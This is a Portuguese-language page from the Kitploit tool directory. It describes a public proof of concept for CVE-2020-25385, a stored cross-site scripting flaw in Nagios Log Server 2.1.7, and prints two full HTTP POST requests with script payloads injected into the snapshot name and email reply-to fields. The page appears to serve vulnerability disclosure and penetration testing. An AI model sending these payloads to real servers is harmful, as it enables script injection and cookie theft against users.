Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting — Um cross-site scripting (XSS) armazenado no Nagios Log Server 2.1.7 pode permitir que um atacante execute ações maliciosas contra usuários que abrem um link criado de forma maliciosa ou uma página da web de terceiros. | Kitploit
Ferramentas/GitHubGitHub/emreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubemreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Um cross-site scripting (XSS) armazenado no Nagios Log Server 2.1.7 pode permitir que um atacante execute ações maliciosas contra usuários que abrem um link criado de forma maliciosa ou uma página da web de terceiros.

Ver Repositório
32há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Um cross-site scripting (XSS) persistente no Nagios Log Server 2.1.7 pode resultar em um atacante realizando ações maliciosas contra usuários que abrem um link criado com fins maliciosos ou uma página web de terceiros.

O Nagios Log Server 2.1.7 e versões anteriores são afetados por estas vulnerabilidades.

CVE-2020-25385

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25385

PoC-1

Para explorar a vulnerabilidade, alguém poderia usar uma requisição POST para '/nagioslogserver/configure/create_snapshot' manipulando o parâmetro 'snapshot_name' no corpo da requisição para impactar usuários que abrem um link criado com fins maliciosos ou uma página web de terceiros.

root@kitploit:~
POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E

PoC-2

Para explorar a vulnerabilidade, alguém poderia usar uma requisição POST para '/nagioslogserver/admin/mail' manipulando o parâmetro 'email_reply_to_name' no corpo da requisição para impactar usuários que abrem um link criado com fins maliciosos ou uma página web de terceiros.

root@kitploit:~
POST /nagioslogserver/admin/mail HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
DNT: 1
Connection: close
Cookie: csrf_ls=6e418c757282ab5c4785dad327238158; ls_session=pscogfricmnpe9kpvbtcuccn8mfempgp
Upgrade-Insecure-Requests: 1

csrf_ls=6e418c757282ab5c4785dad327238158&email_from_name=Nagios+Log+Server&email_from=root%40localhost&email_reply_to_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email_reply_to=root%40localhost&email_method=mail&smtp_host=&smtp_crypto=&smtp_port=25&smtp_user=&smtp_pass=

Baixar ferramenta